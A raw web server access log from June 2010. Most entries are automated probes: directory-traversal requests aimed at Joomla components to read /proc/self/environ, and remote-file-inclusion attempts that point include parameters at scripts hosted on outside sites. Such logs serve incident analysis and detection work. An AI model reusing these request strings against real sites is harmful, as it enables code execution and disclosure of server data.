87.238.162.146 - - [29/Jun/2010:11:27:20 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
211.234.100.196 - - [29/Jun/2010:11:27:21 -0500] "GET /index2.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
75.125.254.98 - - [29/Jun/2010:11:27:29 -0500] "GET /logs/access_log.1274832000/index2.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:11:27:29 -0500] "GET /index2.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:11:27:29 -0500] "GET /logs/index2.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:11:27:31 -0500] "GET /logs/access_log.1274832000/index2.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:11:27:31 -0500] "GET /index2.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:11:27:31 -0500] "GET /logs/index2.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
80.177.1.221 - - [29/Jun/2010:11:27:34 -0500] "GET /logs/access_log.1266710400//skin/zero_vote/error.php?dir=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.0" 404 324 "-""libwww-perl/5.805"
80.177.1.221 - - [29/Jun/2010:11:27:34 -0500] "GET //skin/zero_vote/error.php?dir=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.0" 404 297 "-""libwww-perl/5.805"
80.177.1.221 - - [29/Jun/2010:11:27:34 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.0" 404 302 "-""libwww-perl/5.805"
87.238.162.146 - - [29/Jun/2010:11:27:42 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
211.234.100.196 - - [29/Jun/2010:11:27:45 -0500] "GET /index2.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.234.100.196 - - [29/Jun/2010:11:28:15 -0500] "GET /index2.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
75.125.254.98 - - [29/Jun/2010:11:28:18 -0500] "GET /logs/access_log.1274572800/index2.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:11:28:18 -0500] "GET /index2.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:11:28:18 -0500] "GET /logs/index2.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
211.234.100.196 - - [29/Jun/2010:11:28:18 -0500] "GET /index2.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.234.100.196 - - [29/Jun/2010:11:28:18 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
75.125.254.98 - - [29/Jun/2010:11:28:20 -0500] "GET /logs/access_log.1274572800/index2.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:11:28:20 -0500] "GET /index2.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:11:28:20 -0500] "GET /logs/index2.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:11:28:46 -0500] "GET /logs/access_log.1274832000/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:11:28:47 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:11:28:47 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
211.234.100.196 - - [29/Jun/2010:11:28:48 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
75.125.254.98 - - [29/Jun/2010:11:28:50 -0500] "GET /logs/access_log.1274832000/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:11:28:50 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:11:28:51 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:11:29:23 -0500] "GET /logs/access_log.1274572800/index2.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:11:29:23 -0500] "GET /index2.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:11:29:23 -0500] "GET /logs/index2.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:11:29:34 -0500] "GET /logs/access_log.1277424000/index2.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:11:29:34 -0500] "GET /logs/access_log.1277424000/index2.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:11:29:34 -0500] "GET /logs/access_log.1277424000/index2.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:11:29:35 -0500] "GET /logs/access_log.1277424000/index2.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
114.200.199.236 - - [29/Jun/2010:11:29:42 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
75.125.254.98 - - [29/Jun/2010:11:30:47 -0500] "GET /logs/access_log.1274832000/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:11:30:47 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:11:30:47 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
211.234.100.196 - - [29/Jun/2010:11:30:51 -0500] "GET /logs/access_log.1274832000/index2.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
211.234.100.196 - - [29/Jun/2010:11:30:51 -0500] "GET /index2.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.234.100.196 - - [29/Jun/2010:11:30:52 -0500] "GET /logs/index2.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
211.234.100.196 - - [29/Jun/2010:11:31:08 -0500] "GET /logs/access_log.1274572800/index2.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
211.234.100.196 - - [29/Jun/2010:11:31:09 -0500] "GET /index2.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.234.100.196 - - [29/Jun/2010:11:31:09 -0500] "GET /logs/index2.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
211.234.100.196 - - [29/Jun/2010:11:31:14 -0500] "GET /logs/access_log.1274572800/index2.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
211.234.100.196 - - [29/Jun/2010:11:31:15 -0500] "GET /index2.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.234.100.196 - - [29/Jun/2010:11:31:16 -0500] "GET /logs/access_log.1274832000/index2.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
211.234.100.196 - - [29/Jun/2010:11:31:16 -0500] "GET /logs/index2.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
211.234.100.196 - - [29/Jun/2010:11:31:16 -0500] "GET /index2.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.234.100.196 - - [29/Jun/2010:11:31:17 -0500] "GET /logs/index2.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
75.125.254.98 - - [29/Jun/2010:11:31:24 -0500] "GET /logs/access_log.1274832000/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:11:31:24 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:11:31:24 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
211.234.100.196 - - [29/Jun/2010:11:32:46 -0500] "GET /logs/access_log.1274918400/index2.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
211.234.100.196 - - [29/Jun/2010:11:32:47 -0500] "GET /logs/access_log.1274918400/index2.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
211.234.100.196 - - [29/Jun/2010:11:33:38 -0500] "GET /logs/access_log.1275696000/index2.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
211.234.100.196 - - [29/Jun/2010:11:33:53 -0500] "GET /logs/access_log.1275696000/index2.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
117.102.100.183 - - [29/Jun/2010:11:34:23 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
75.125.254.98 - - [29/Jun/2010:11:34:32 -0500] "GET /logs/access_log.1274572800/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:11:34:32 -0500] "GET /logs/access_log.1274572800/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
117.102.100.183 - - [29/Jun/2010:11:36:51 -0500] "GET /logs/access_log.1274572800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
117.102.100.183 - - [29/Jun/2010:11:37:00 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
117.102.100.183 - - [29/Jun/2010:11:37:03 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
75.125.254.98 - - [29/Jun/2010:11:37:43 -0500] "GET /logs/access_log.1276041600/?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:11:37:43 -0500] "GET /?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:11:37:43 -0500] "GET /logs/?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11360 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:11:37:59 -0500] "GET /logs/access_log.1276041600/?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:11:37:59 -0500] "GET /?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:11:37:59 -0500] "GET /logs/?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11360 "-""libwww-perl/5.834"
93.186.192.124 - - [29/Jun/2010:11:38:02 -0500] "GET /akocomments.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
93.186.192.124 - - [29/Jun/2010:11:38:02 -0500] "GET /logs/access_log.1266710400%20%20/akocomments.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
93.186.192.124 - - [29/Jun/2010:11:38:02 -0500] "GET /logs/akocomments.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
93.186.192.124 - - [29/Jun/2010:11:38:40 -0500] "GET /logs/access_log.1266710400%20%20/akocomments.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
93.186.192.124 - - [29/Jun/2010:11:38:40 -0500] "GET /akocomments.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
93.186.192.124 - - [29/Jun/2010:11:38:40 -0500] "GET /logs/akocomments.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
211.234.100.196 - - [29/Jun/2010:11:38:49 -0500] "GET /logs/access_log.1274832000/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
211.234.100.196 - - [29/Jun/2010:11:38:49 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.234.100.196 - - [29/Jun/2010:11:38:50 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.118.96.11 - - [29/Jun/2010:11:39:00 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
211.234.100.196 - - [29/Jun/2010:11:39:01 -0500] "GET /logs/access_log.1274832000/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
211.234.100.196 - - [29/Jun/2010:11:39:01 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.234.100.196 - - [29/Jun/2010:11:39:02 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
204.51.96.211 - - [29/Jun/2010:11:39:15 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
216.129.119.43 - - [29/Jun/2010:11:39:49 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.238.162.146 - - [29/Jun/2010:11:41:47 -0500] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
83.16.100.218 - - [29/Jun/2010:11:44:41 -0500] "GET /logs/administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://www.apbs.pl/images/open.jpg??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
83.16.100.218 - - [29/Jun/2010:11:44:41 -0500] "GET /administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://www.apbs.pl/images/open.jpg??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
83.16.100.218 - - [29/Jun/2010:11:44:41 -0500] "GET /logs/access_log.1266710400/administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://www.apbs.pl/images/open.jpg??? HTTP/1.1" 404 376 "-""Mozilla/5.0"
211.234.100.196 - - [29/Jun/2010:11:45:06 -0500] "GET /logs/access_log.1274572800/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
211.234.100.196 - - [29/Jun/2010:11:45:15 -0500] "GET /logs/access_log.1274572800/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
114.200.199.236 - - [29/Jun/2010:11:45:56 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
93.186.192.124 - - [29/Jun/2010:11:46:14 -0500] "GET /logs/access_log.1266710400/akocomments.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
92.53.106.20 - - [29/Jun/2010:11:47:03 -0500] "GET /logs///skin/pqbig_board_blue/login.php?dir=http://djwenterprizes.com/mozhet/1.pdf? HTTP/1.1" 404 322 "-""Mozilla/5.0"
92.53.106.20 - - [29/Jun/2010:11:47:03 -0500] "GET /logs/access_log.1277164800%20%20///skin/pqbig_board_blue/login.php?dir=http://djwenterprizes.com/mozhet/1.pdf? HTTP/1.1" 404 346 "-""Mozilla/5.0"
92.53.106.20 - - [29/Jun/2010:11:47:04 -0500] "GET ///skin/pqbig_board_blue/login.php?dir=http://djwenterprizes.com/mozhet/1.pdf? HTTP/1.1" 404 317 "-""Mozilla/5.0"
204.51.97.183 - - [29/Jun/2010:11:47:06 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
204.51.97.183 - - [29/Jun/2010:11:47:06 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
204.51.97.183 - - [29/Jun/2010:11:47:06 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
204.51.96.211 - - [29/Jun/2010:11:47:13 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
204.51.96.211 - - [29/Jun/2010:11:47:13 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
204.51.96.211 - - [29/Jun/2010:11:47:13 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
114.200.199.236 - - [29/Jun/2010:11:47:22 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
204.51.96.211 - - [29/Jun/2010:11:47:26 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
204.51.96.211 - - [29/Jun/2010:11:47:26 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
204.51.96.211 - - [29/Jun/2010:11:47:26 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
114.200.199.236 - - [29/Jun/2010:11:47:41 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
92.53.106.20 - - [29/Jun/2010:11:47:57 -0500] "GET /logs/access_log.1277164800///skin/pqbig_board_blue/login.php?dir=http://djwenterprizes.com/mozhet/1.pdf? HTTP/1.1" 404 344 "-""Mozilla/5.0"
92.53.106.20 - - [29/Jun/2010:11:47:57 -0500] "GET /logs///skin/pqbig_board_blue/login.php?dir=http://djwenterprizes.com/mozhet/1.pdf? HTTP/1.1" 404 322 "-""Mozilla/5.0"
92.53.106.20 - - [29/Jun/2010:11:47:57 -0500] "GET ///skin/pqbig_board_blue/login.php?dir=http://djwenterprizes.com/mozhet/1.pdf? HTTP/1.1" 404 317 "-""Mozilla/5.0"
114.200.199.236 - - [29/Jun/2010:11:48:01 -0500] "GET /logs/access_log.1274832000/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
114.200.199.236 - - [29/Jun/2010:11:48:01 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
114.200.199.236 - - [29/Jun/2010:11:48:02 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11360 "-""libwww-perl/5.79"
114.200.199.236 - - [29/Jun/2010:11:48:03 -0500] "GET /logs/access_log.1277164800/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
80.177.1.221 - - [29/Jun/2010:11:48:04 -0500] "GET /logs/access_log.1277424000//http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.0" 404 352 "-""libwww-perl/5.805"
81.208.34.38 - - [29/Jun/2010:11:49:00 -0500] "GET /logs/access_log.1275264000//poll/poll_ssi.php?include_path=http://carollia.indelec.cz/Meatio_Develop/code/SA_Scripts/id.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.808"
67.218.116.165 - - [29/Jun/2010:11:49:01 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
81.208.34.38 - - [29/Jun/2010:11:49:01 -0500] "GET //poll/poll_ssi.php?include_path=http://carollia.indelec.cz/Meatio_Develop/code/SA_Scripts/id.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.808"
81.208.34.38 - - [29/Jun/2010:11:49:01 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://carollia.indelec.cz/Meatio_Develop/code/SA_Scripts/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.808"
81.208.34.38 - - [29/Jun/2010:11:49:35 -0500] "GET /logs/access_log.1275264000//poll/poll_ssi.php?include_path=http://carollia.indelec.cz/Meatio_Develop/code/SA_Scripts/id.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.808"
81.208.34.38 - - [29/Jun/2010:11:49:35 -0500] "GET //poll/poll_ssi.php?include_path=http://carollia.indelec.cz/Meatio_Develop/code/SA_Scripts/id.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.808"
81.208.34.38 - - [29/Jun/2010:11:49:35 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://carollia.indelec.cz/Meatio_Develop/code/SA_Scripts/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.808"
114.200.199.236 - - [29/Jun/2010:11:50:03 -0500] "GET /logs/access_log.1277164800/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
114.200.199.236 - - [29/Jun/2010:11:50:03 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
114.200.199.236 - - [29/Jun/2010:11:50:04 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11360 "-""libwww-perl/5.79"
87.118.96.11 - - [29/Jun/2010:11:50:20 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
87.118.96.11 - - [29/Jun/2010:11:50:20 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
87.118.96.11 - - [29/Jun/2010:11:50:21 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
87.118.96.11 - - [29/Jun/2010:11:50:36 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
87.118.96.11 - - [29/Jun/2010:11:50:36 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
87.118.96.11 - - [29/Jun/2010:11:50:37 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
173.83.250.93 - - [29/Jun/2010:11:50:54 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
92.53.106.20 - - [29/Jun/2010:11:50:57 -0500] "GET /logs/access_log.1266710400///skin/pqbig_board_blue/login.php?dir=http://djwenterprizes.com/mozhet/1.pdf? HTTP/1.1" 404 344 "-""Mozilla/5.0"
38.113.115.196 - - [29/Jun/2010:11:51:01 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
